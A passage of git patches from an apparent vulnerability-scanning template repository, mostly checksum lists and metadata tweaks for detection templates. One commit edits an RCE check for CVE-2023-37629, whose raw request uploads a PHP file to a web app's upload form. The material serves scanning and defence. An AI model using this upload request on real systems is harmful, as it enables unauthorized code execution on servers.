+http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e
+http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2
+http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82
+http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4
+http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156
+http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4
+http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147
+http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19
+http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b
+http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8
+http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55
+http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd
+http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08
+http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f
+http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7
+http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6
+http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a
 http/technologies/wordpress/plugins/simple-page-ordering.yaml:5ca11a9af02a43514837bfae1a4b1e0271674751
-http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492
-http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81
-http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350
-http/technologies/wordpress/plugins/so-widgets-bundle.yaml:243974a21f98da84c266affec329cc4d1f9596da
+http/technologies/wordpress/plugins/siteguard.yaml:e4a47780641caa5fc7b28702a8619544f10ad1d2
+http/technologies/wordpress/plugins/siteorigin-panels.yaml:581d45daed9aa4def46869c8dc9770508824abfd
+http/technologies/wordpress/plugins/smart-slider-3.yaml:cd1b9cefc186446cdd9209cdd5c456dbcbb42730
+http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f7e37fa2f502dd7c949c0bf8b43dec56315cc35c
 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:c9da76f5a8dab4cb65e35e49aebd0300fe20c1a8
-http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f
-http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6
-http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1
-http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa
-http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08
-http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2
-http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338
-http/technologies/wordpress/plugins/themeisle-companion.yaml:308725e3df3f6646f7b024131e4787deca30e357
-http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903
-http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237
-http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4
-http/technologies/wordpress/plugins/under-construction-page.yaml:006b99ffb995bb30292666cd1d26a6433d95d495
+http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d3b0d6984b6149fc9c376c67f4427c286a42c4d1
+http/technologies/wordpress/plugins/sucuri-scanner.yaml:de8bfb0cfbd640fc53b8eeeda80fbdf787b66b69
+http/technologies/wordpress/plugins/svg-support.yaml:352c1dd32804e85f4df4b22834ca0e797a2aad60
+http/technologies/wordpress/plugins/table-of-contents-plus.yaml:eb076e2a3b271ec1744b1b244cedc859b97b2dcc
+http/technologies/wordpress/plugins/tablepress.yaml:c3594421fecfa1311ccd792b99201de358316284
+http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:686b9870e43a0eb740d247fb83a567700577df9b
+http/technologies/wordpress/plugins/the-events-calendar.yaml:d1c59cba049e515abed8ca65950cd156cb84c928
+http/technologies/wordpress/plugins/themeisle-companion.yaml:680ce8f2109280e4684d527b0cda47fd480711a4
+http/technologies/wordpress/plugins/tinymce-advanced.yaml:89c4aa06eb4911cfa3b826a3d8203bf605610f1a
+http/technologies/wordpress/plugins/translatepress-multilingual.yaml:7e6c3b01800f88b4ff69e32cadfb3281e73b9390
+http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:6ddb9cd781f24984eb82258381b8fafd1dee8a2a
+http/technologies/wordpress/plugins/under-construction-page.yaml:d4c9887eca48da58b42bdcad120c493e4b916e35
 http/technologies/wordpress/plugins/unyson.yaml:51e3ce4490086550b60f59a3f2f7e401001db1ea
-http/technologies/wordpress/plugins/updraftplus.yaml:67b8ef043332480e6cc21270e92a83846dfef37f
-http/technologies/wordpress/plugins/use-any-font.yaml:4839586b85559db12191032b7fe4154b683a25bd
-http/technologies/wordpress/plugins/user-role-editor.yaml:ba1c35cfae35cd0ad01726b3b5862f7ca8094db8
-http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:27cbc019dd6d9540482e167bb4a9f0c95bfbd233
-http/technologies/wordpress/plugins/w3-total-cache.yaml:ad66a00a01da5e7b8cff52912b27f6bad0f3839c
-http/technologies/wordpress/plugins/webp-converter-for-media.yaml:2c96756602c58b2d03c3a251b485f0fc290d4521
-http/technologies/wordpress/plugins/webp-express.yaml:3fdaee8be60980e572316df08fdc1bae378f1c6a
-http/technologies/wordpress/plugins/widget-importer-exporter.yaml:0bf8d28a1008e3b9fd4e318adabd44506ddf3472
-http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:871c7b41aebc284ba9d5bc1607270888fb05b634
-http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:f8a89bab5553200004cd4ed2ff74f2f0ed6d3839
-http/technologies/wordpress/plugins/woo-variation-swatches.yaml:15b3a184c874db99255ba2551d4d925b71fba265
-http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:8e91bc3725d0de356884685dddd7736c9a637e67
-http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:d3230d977d47969a5dabaa59f5207bd47a4eba82
-http/technologies/wordpress/plugins/woocommerce-payments.yaml:3c8f70f3717ebb144aeecc4cf78351928e724ee4
-http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:e8e143f83f92d8128f4dcc8cfae0d24e744ff11b
-http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:8f2e7130b683e6c7db2d572d169d8b0d2959b8ee
-http/technologies/wordpress/plugins/woocommerce-services.yaml:9f4168ea86b7c265e840ecc39c5cd91457b69bba
-http/technologies/wordpress/plugins/woocommerce.yaml:ab02a75370fec98f312be65543b5571bb0495e40
+http/technologies/wordpress/plugins/updraftplus.yaml:0076f3c9a5ed4f2e2d2749c1b65eb23140214d7a
+http/technologies/wordpress/plugins/use-any-font.yaml:382b7daeb7b74956c8e3ee5f4c65254c65c4e487
+http/technologies/wordpress/plugins/user-role-editor.yaml:7c91ccbbd4225e3f1ad358f2a6feeb311b3f81fb
+http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:d3a9e8b173ba11ca7733ed58895d793b2824ba5e
+http/technologies/wordpress/plugins/w3-total-cache.yaml:d19a3d9cd406a2763a5d1e15391d260258f10d97
+http/technologies/wordpress/plugins/webp-converter-for-media.yaml:d438f3628f635772866af020c74bad5dfe1d0404
+http/technologies/wordpress/plugins/webp-express.yaml:28c13e642196daae49de19d38ef3e5890e9cccf8
+http/technologies/wordpress/plugins/widget-importer-exporter.yaml:a698c5c96df88e883aab70f73fe5b489a8470adc
+http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6ce9a25f844c90dc4a8a0ed085692d03e0e643ae
+http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:0c20bcedf17334904bd329de1f9596cfecca9ae6
+http/technologies/wordpress/plugins/woo-variation-swatches.yaml:f4bbcbe628b62a5853af61a175bec617bb48fbe4
+http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:94e0db445fc82d755e55292d448d99a450ae723c
+http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:a0bd411538fbdd622c592fbf6c705753f3b1ca18
+http/technologies/wordpress/plugins/woocommerce-payments.yaml:9ed780c632c83cd2d948af2a01eee2ea9cdd87a5
+http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:fc7c14abefdde2e6a9b280a04e504c623f2168bf
+http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d498033186c927e965619ba1736f8dc88c2c88b1
+http/technologies/wordpress/plugins/woocommerce-services.yaml:053a38cfa9a063b0475a7ec28d1f00c85589ffb6
+http/technologies/wordpress/plugins/woocommerce.yaml:21e14ecdd9795d0b3377c8cdb370ef2408a902c4
 http/technologies/wordpress/plugins/woosidebars.yaml:49e90e83fc3185fed5f2c0392a13a991ab64601d
-http/technologies/wordpress/plugins/wordfence.yaml:0462473344c345d9c4eb312705ebfcc5505cdcf5
-http/technologies/wordpress/plugins/wordpress-importer.yaml:205349dfc8dd684e8ab78d952a214f75af080074
-http/technologies/wordpress/plugins/wordpress-seo.yaml:0a74d6507bf2d8dbb696036a525130a48bdb1a68
-http/technologies/wordpress/plugins/worker.yaml:8e8fc14abfc1380551a94ee7f122b912bcacb4bd
-http/technologies/wordpress/plugins/wp-fastest-cache.yaml:ad1d73e97bbcc497867ff8d72002f8aebcf52ae2
-http/technologies/wordpress/plugins/wp-file-manager.yaml:ca4c546d57e540d639a66acd375eeb7d0b90fe5a
-http/technologies/wordpress/plugins/wp-google-maps.yaml:c2c7c8477a9742575d40bdc508937798d5c9f6a3
-http/technologies/wordpress/plugins/wp-mail-smtp.yaml:6091e5b4597b0556c2705a55b964b1b0f8c1f369
-http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:15d672886d871a30b62b87539ab11136bba70bb0
-http/technologies/wordpress/plugins/wp-migrate-db.yaml:44a5b5c4175d7c71e76216915ef4d2b1275881b1
-http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:65e0cf9f44588209a789e704fd5d4070f6482962
-http/technologies/wordpress/plugins/wp-optimize.yaml:31c2935841bd67eeeb87524152bb389c823d9ded
-http/technologies/wordpress/plugins/wp-pagenavi.yaml:96b012cb4c09e81ee2bf7e679cf96b2dbb1066f8
-http/technologies/wordpress/plugins/wp-reset.yaml:412514499164783863b8b68430c7f197f8b6ae54
-http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:ba98eba18acb3e8959037689a48560a9ce31a9f1
-http/technologies/wordpress/plugins/wp-rollback.yaml:4e307fe6f0d30b930431b040e0f478add975ad92
+http/technologies/wordpress/plugins/wordfence.yaml:59cf258e463fa7f76b21f3b3088b1d91a8ac44ee
+http/technologies/wordpress/plugins/wordpress-importer.yaml:3a47895288fe9d8d9ada42228022e25510544e8c
+http/technologies/wordpress/plugins/wordpress-seo.yaml:86e00ac8b21548056c7a9efbba9b66c675928457
+http/technologies/wordpress/plugins/worker.yaml:909166af340135b049385064e0cac70e3168c34f
+http/technologies/wordpress/plugins/wp-fastest-cache.yaml:8bcbdb8253bd78b63c34db17f1c754c5ebd2bd9f
+http/technologies/wordpress/plugins/wp-file-manager.yaml:cb51b1eaed5e009fa74ccad652e4590ff3613fd0
+http/technologies/wordpress/plugins/wp-google-maps.yaml:fa3a0d2461909eb76f9f4176a82719abe2a8baee
+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:65d7a5942c9f22136fdf1568a47532465a0fd8e8
+http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:ba76df7ace8e17dbd081adb0beafa3d2e9a2751c
+http/technologies/wordpress/plugins/wp-migrate-db.yaml:eb5434734e59d7dac0579b08905ee11bc5ad623e
+http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:0b8258608436387a5af44bb17dc664261d84dc20
+http/technologies/wordpress/plugins/wp-optimize.yaml:b4c12386fa882d15ce98bc19736fe42f397ff7ce
+http/technologies/wordpress/plugins/wp-pagenavi.yaml:1ee64be881e3ce5eff6e61a1bf7b3878a4aa80c3
+http/technologies/wordpress/plugins/wp-reset.yaml:4aeb62db4c520ed2a1128a3931f1da1627d5504b
+http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:69b5e88af7e6e7b825f22b6f6eb34dea213dab95
+http/technologies/wordpress/plugins/wp-rollback.yaml:7a2b71c8a6a0c35005dad0fd021f4daa29209549
 http/technologies/wordpress/plugins/wp-seopress.yaml:93a821f479301582f2209a9f463b408118cfbec9
-http/technologies/wordpress/plugins/wp-sitemap-page.yaml:44243c1cc0d8c94a0ca19b5baf1f6f6fb70900a5
-http/technologies/wordpress/plugins/wp-smushit.yaml:d67ff121c4ac38fa566628f9966cf334348e1245
-http/technologies/wordpress/plugins/wp-statistics.yaml:3c959f67560b1721401a000bded1bc2959c303d1
-http/technologies/wordpress/plugins/wp-super-cache.yaml:0b19548fad990c640012c855076270e0491c2a6f
-http/technologies/wordpress/plugins/wp-user-avatar.yaml:1086201347cbaa54c492a64cfda00759e950437b
-http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:9f2183e36b5e1b85cd6849073307e5cad8d5b52d
-http/technologies/wordpress/plugins/wpcf7-redirect.yaml:ba93d4ef4608a790cd9d3d847b68bf9b1e1dea50
-http/technologies/wordpress/plugins/wpforms-lite.yaml:936181dc67fd85927eb912b1022a8a7c24b4a848
-http/technologies/wordpress/plugins/wps-hide-login.yaml:54566fd541d82b11fb105253384e00a14bc1cc75
-http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:c89d7b1d8eff0f72ba3d4ad3b54683d9b08a81bb
+http/technologies/wordpress/plugins/wp-sitemap-page.yaml:583c9968cc733e34f6b8b5b61a953c2d4b95e27b
+http/technologies/wordpress/plugins/wp-smushit.yaml:cd360eb2304096cd0f7ec6a67f1f6ed239320676
+http/technologies/wordpress/plugins/wp-statistics.yaml:3a7c780acc3cd312da690aa73dae8ccd151a9a90
+http/technologies/wordpress/plugins/wp-super-cache.yaml:cdb330ec2ee847335d17369905afe5b1ebb9b624
+http/technologies/wordpress/plugins/wp-user-avatar.yaml:401a4a8d3ad83bd1c23fd1be67314742cbf72468
+http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:5194cfad7904c267af9451baf7460c96d5310e02
+http/technologies/wordpress/plugins/wpcf7-redirect.yaml:66ae3a35ed37853fe298506a45469b3300e9f671
+http/technologies/wordpress/plugins/wpforms-lite.yaml:cb9b2f5385e57ef8acd020fc2acb090d2a5d7d40
+http/technologies/wordpress/plugins/wps-hide-login.yaml:791f9ccdb7e2de037094e6c41cebf6d93f50cf90
+http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:1760dbfa341c1f3dc21ad5d33393b55216735c39
 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:061c0ff47f223158098b68a346e0c536112e8259
-http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:e3e323f44082c7c6610d1016c0062d40a6f6d788
+http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:83ae1cae0ae4886afdebf8213bfea549ca025f8a
 http/technologies/wordpress-detect.yaml:764a9e3823e31a5c778e6abb4d6065347a2005e9
 http/technologies/workerman-websocket-detect.yaml:fca8ff5fffe7de46782ab042287eddee06e883ed
 http/technologies/wso2-products-detect.yaml:9156bb5d6fccb55637e4fd2e59f0decc99c3fa69
@@ -7069,7 +7070,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:be239784cf99d84efb743ee28fe22c7241f9255a
+templates-checksum.txt:10f5f104ba58aa907e68fb8f3afc4c2ae9032066
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 89683e2c2b10ba191831981cc7458d810153293f Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:24:13 +0530
Subject: [PATCH 0383/1090] info update

---
 http/cves/2023/CVE-2023-39677.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml
index a95a85b014..d92f5e9e04 100644
--- a/http/cves/2023/CVE-2023-39677.yaml
+++ b/http/cves/2023/CVE-2023-39677.yaml
@@ -1,16 +1,18 @@
 id: CVE-2023-39677
 
 info:
-  name: PrestaShop MyPrestaModules PHPInfo - Disclosure
+  name: PrestaShop MyPrestaModules - PhpInfo Disclosure
   author: meme-lord
   severity: low
-  description: PrestaShop modules by MyPrestaModules expose PHPInfo
+  description: |
+    PrestaShop modules by MyPrestaModules expose PHPInfo
   reference:
     - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
+    - https://cve.report/CVE-2023-39677
   metadata:
     max-request: 1
+    verified: true
     shodan-query: http.component:"PrestaShop"
-    verified: "true"
   tags: cve,cve2023,prestashop,phpinfo,disclosure
 
 http:

From 4bd85580759c9eb9099a0e0bbac8500dd83691cc Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:31:17 +0530
Subject: [PATCH 0384/1090] matchers & info update

---
 http/exposed-panels/quilium-panel.yaml | 20 ++++++++++++++------
 1 file changed, 14 insertions(+), 6 deletions(-)

diff --git a/http/exposed-panels/quilium-panel.yaml b/http/exposed-panels/quilium-panel.yaml
index e42270a97b..902d38f94a 100644
--- a/http/exposed-panels/quilium-panel.yaml
+++ b/http/exposed-panels/quilium-panel.yaml
@@ -5,7 +5,7 @@ info:
   author: righettod
   severity: info
   description: |
-    Quilium CMS was detected.
+    Quilium CMS Login Panel was detected.
   reference:
     - https://www.quilium.io/
   metadata:
@@ -17,15 +17,23 @@ info:
 http:
   - method: GET
     path:
+      - '{{BaseURL}}'
       - '{{BaseURL}}/en/login'
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
-      - type: dsl
-        dsl:
-          - "contains(tolower(body), 'cms quilium')"
-          - "status_code==200"
-        condition: and
+      - type: word
+        part: body
+        words:
+          - 'content="CMS Quilium'
+          - 'Quilium'
+        condition: or
+        case-insensitive: true
+
+      - type: status
+        status:
+          - 200
 
     extractors:
       - type: regex

From ac23a07f46f9b22770f787de1cb956bd433687a2 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:01:48 +0000
Subject: [PATCH 0385/1090] Auto Generated New Template Addition List [Fri Sep
 15 17:01:47 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 78dc56cfa6..a90c48a4e3 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+http/cves/2023/CVE-2023-22463.yaml
 http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml

From 9395164f8e803aa73e5c71093fd6995b2338db5c Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:01:55 +0000
Subject: [PATCH 0386/1090] Auto Generated Templates Checksum [Fri Sep 15
 17:01:55 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 5030351c8a..9d2cb76d29 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2510,6 +2510,7 @@ http/cves/2023/CVE-2023-20889.yaml:52c965e087052dc59477a36dd4a8c21e8d4131a3
 http/cves/2023/CVE-2023-2122.yaml:6f0031e3f34494af5940ca7612465948974dc403
 http/cves/2023/CVE-2023-2130.yaml:89a9e92c847403cb5126697db1113312e7946264
 http/cves/2023/CVE-2023-2178.yaml:1586330fff2408fd73ef06a56d80b8bef5309bae
+http/cves/2023/CVE-2023-22463.yaml:df4c656faf962dc07591e1cc2f28c6a23e8a1fcf
 http/cves/2023/CVE-2023-22478.yaml:295acc7bb7f51c78b10b78292142857933e609e7
 http/cves/2023/CVE-2023-22480.yaml:f41aa30cd23eff1c64e4e1f24031e1e43f5f204e
 http/cves/2023/CVE-2023-2252.yaml:c5bf60a32ed4b9435fc9d072088ad8d8dfc6b077
@@ -7070,7 +7071,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:10f5f104ba58aa907e68fb8f3afc4c2ae9032066
+templates-checksum.txt:14fb0b2888df106621fe44c4efb147c71faa1ed8
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 0e3fad30a817292f4b09883f69eb0fbef1ddab09 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:02:50 +0000
Subject: [PATCH 0387/1090] Auto Generated New Template Addition List [Fri Sep
 15 17:02:50 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index a90c48a4e3..c99e472f6d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-22463.yaml
 http/cves/2023/CVE-2023-25573.yaml
 http/cves/2023/CVE-2023-30943.yaml
 http/cves/2023/CVE-2023-39676.yaml
+http/cves/2023/CVE-2023-39677.yaml
 http/cves/2023/CVE-2023-4714.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
 http/exposed-panels/satis-repository.yaml

From 6a2ecba3ae3016bab13cb53601c9c4f5c421406f Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:03:03 +0000
Subject: [PATCH 0388/1090] Auto Generated Templates Checksum [Fri Sep 15
 17:03:03 UTC 2023] :robot:

---
 templates-checksum.txt | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 9d2cb76d29..86ff60a82b 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -2640,6 +2640,7 @@ http/cves/2023/CVE-2023-39361.yaml:027864ed06754ef87a7de376519681d526b46eb6
 http/cves/2023/CVE-2023-39598.yaml:8e973be5da8bbccce493cb02d6a2c314605b02a6
 http/cves/2023/CVE-2023-39600.yaml:c326d0e518d5a41c899dbf0a15c6d4e28f00b705
 http/cves/2023/CVE-2023-39676.yaml:66ffbd384c6992c5a70fc66c29a75aa2fdd22f3b
+http/cves/2023/CVE-2023-39677.yaml:4feca8145618681d4c45940f4ec6b0dc80eddf23
 http/cves/2023/CVE-2023-4173.yaml:6b300087c13e3a095031bc1a2d0f8d8590f1a6d8
 http/cves/2023/CVE-2023-4174.yaml:d2cf616712e64eea743b6c401fbfd482418ec12e
 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071
@@ -7071,7 +7072,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed
 ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750
 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0
 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e
-templates-checksum.txt:14fb0b2888df106621fe44c4efb147c71faa1ed8
+templates-checksum.txt:80942f2012cf892edb137a2c2fe6e6850e3eccb4
 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c
 workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f

From 86659ff1f4dc0f6022e1357fef9393da5d02338b Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:04:28 +0000
Subject: [PATCH 0389/1090] TemplateMan Update [Fri Sep 15 17:04:28 UTC 2023]
 :robot:

---
 http/cves/2023/CVE-2023-39677.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml
index d92f5e9e04..901b769e1d 100644
--- a/http/cves/2023/CVE-2023-39677.yaml
+++ b/http/cves/2023/CVE-2023-39677.yaml
@@ -10,9 +10,9 @@ info:
     - https://blog.sorcery.ie/posts/myprestamodules_phpinfo/
     - https://cve.report/CVE-2023-39677
   metadata:
-    max-request: 1
-    verified: true
+    max-request: 2
     shodan-query: http.component:"PrestaShop"
+    verified: true
   tags: cve,cve2023,prestashop,phpinfo,disclosure
 
 http:

From 0f037e98607ec201a4c04561788353ba807b8335 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Fri, 15 Sep 2023 22:39:22 +0530
Subject: [PATCH 0390/1090] request update

---
 http/cves/2023/CVE-2023-37629.yaml | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/http/cves/2023/CVE-2023-37629.yaml b/http/cves/2023/CVE-2023-37629.yaml
index 12945abb69..d314d95df1 100644
--- a/http/cves/2023/CVE-2023-37629.yaml
+++ b/http/cves/2023/CVE-2023-37629.yaml
@@ -15,8 +15,9 @@ info:
     cve-id: CVE-2023-37629
     cwe-id: CWE-434
   metadata:
+    max-request: 1
     verified: true
-  tags: cve,cve2023,fileupload,rce,opms
+  tags: cve,cve2023,fileupload,rce,opms,intrusive
 
 http:
   - raw:
@@ -36,7 +37,7 @@ http:
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
         Content-Disposition: form-data; name="arrived"
 
-        2023-08-10
+        {{date_time("%Y-%M-%D")}}
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
         Content-Disposition: form-data; name="gender"
 
@@ -54,10 +55,10 @@ http:
 
         4fwefwe
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
-        Content-Disposition: form-data; name="pigphoto"; filename="shell.php"
+        Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
         Content-Type: application/x-php
 
-        
+        
 
         -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
         Content-Disposition: form-data; name="submit"

From ebf8698a52f0a1b17130f56d295dbcf3f5913792 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:09:54 +0000
Subject: [PATCH 0391/1090] Auto Generated New Template Addition List [Fri Sep
 15 17:09:54 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index c99e472f6d..8f97155aea 100644
--- a/.new-additions
+++ b/.new-additions
@@ -5,6 +5,7 @@ http/cves/2023/CVE-2023-39676.yaml
 http/cves/2023/CVE-2023-39677.yaml
 http/cves/2023/CVE-2023-4714.yaml
 http/exposed-panels/phpldapadmin-panel.yaml
+http/exposed-panels/quilium-panel.yaml
 http/exposed-panels/satis-repository.yaml
 http/exposed-panels/symantec/symantec-phishing-panel.yaml
 http/misconfiguration/gitlab/gitlab-public-registration.yaml

From 5f0c59c969665899e309a9f293b4a516c15668b8 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Fri, 15 Sep 2023 17:10:07 +0000
Subject: [PATCH 0392/1090] Auto Generated Templates Checksum [Fri Sep 15
 17:10:07 UTC 2023] :robot:

---
 templates-checksum.txt | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 86ff60a82b..4598e0d901 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
